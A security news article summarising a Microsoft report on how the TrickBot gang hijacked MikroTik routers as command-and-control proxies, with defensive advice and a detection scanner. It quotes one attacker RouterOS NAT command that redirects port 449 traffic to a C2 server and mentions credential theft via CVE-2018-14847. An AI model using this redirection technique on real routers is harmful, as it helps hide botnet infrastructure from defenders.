The TrickBot gang hacked MikroTik routers to operate as proxies for command-and-control servers, and Microsoft created a scanner to detect them. TrickBot is a malware botnet that spreads through phishing emails and other malware that has already infected a device. TrickBot will connect to a remote command and control server once it has been executed, receiving orders and downloading further payloads to run on the infected system.
TrickBot has been using IoT devices, such as routers, as a proxy between infected devices and command and control (C2) servers for years. These proxies are used to keep law enforcement and researchers from discovering and destroying their command-and-control infrastructure. Researchers reveal how the TrickBot gang used several approaches to include weak MikroTik routers as proxies for C2 communications in a new Microsoft report.
When breaking into MikroTik routers, the TrickBot operations used various approaches, starting with default credentials and then executing brute force attempts to guess the password. If the threat actors were unable to get access to the router through these techniques, they would try to exploit CVE-2018-14847, a serious directory traversal vulnerability that allows unauthenticated, remote attackers to read arbitrary files. Threat actors might leverage this flaw to steal the ‘user.dat’ file, which holds the router’s user credentials.
The threat actors employed built-in ‘/ip’, ‘/system’, or ‘/tool’ commands to set a network address translation (NAT) rule that redirected traffic delivered to port 449 on the router to port 80 on a remote command and control server after they obtained access to the device.
/ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=[infected device] dst-address=[real C2 address]
The C2 servers aren’t directly exposed to threat analysis because to this IP NAT restriction, but compromised devices can still communicate. As Microsoft points out, the actors appear to have a thorough understanding of the restricted capabilities of the Linux-based OS in MikroTik devices, as seen by their use of bespoke SSH commands.
According to an Eclypsium report released last December, thousands of MikroTik routers are still vulnerable to malware botnets, many years after the maker warned of significant weaknesses. Malicious actors, particularly those interested in resource-intensive activities such as DDoS attacks, consider these devices as high-value targets since they have extremely powerful hardware.
Despite the availability of security improvements for years, many people are still vulnerable to botnet recruiting by exploiting unauthenticated, remote access, and code execution issues. MikroTik device owners have been recommended to update to RouterOS versions newer than 6.45.6 in order to prevent exposing the WinBox protocol.
“This analysis highlights the importance of keeping IoT devices secure in today’s ever evolving threat environment,” Microsoft warns in their report.
Network administrators may now use the forensics tool ‘routeros-scanner‘ from Microsoft to check MikroTik devices for indicators of TrickBot infection. This script will look for the following information on MikroTik devices:
- Get the version of the device and map it to CVEs
- Check for scheduled tasks
- Look for traffic redirection rules
- Look for DNS cache poisoning
- Look for default ports change
- Look for non-default users
- Look for suspicious files
- Look for proxy, socks, and FW rules
To make MikroTik devices even more secure, Microsoft advises doing the following steps:
- Change the default password to something more secure.
- Block port 8291 from external access.
- Change SSH port to something else than the default (22).
- Ensure that your routers have the most recent firmware and fixes.
- For remote access, use a secure virtual private network (VPN) service and limit remote access to the router.
Due to the fact that TrickBot has been interrupted in the past and then relaunched, threat actors may revive the operation in the future. As a result, it’s critical to ensure that devices are adequately protected so that they can’t be exploited in future campaigns or by other malware organizations. Meanwhile, if you have a MikroTik device, you should run Microsoft’s infection scanner because the malicious commands will not be reversed due to the shutdown and might be re-activated in the future.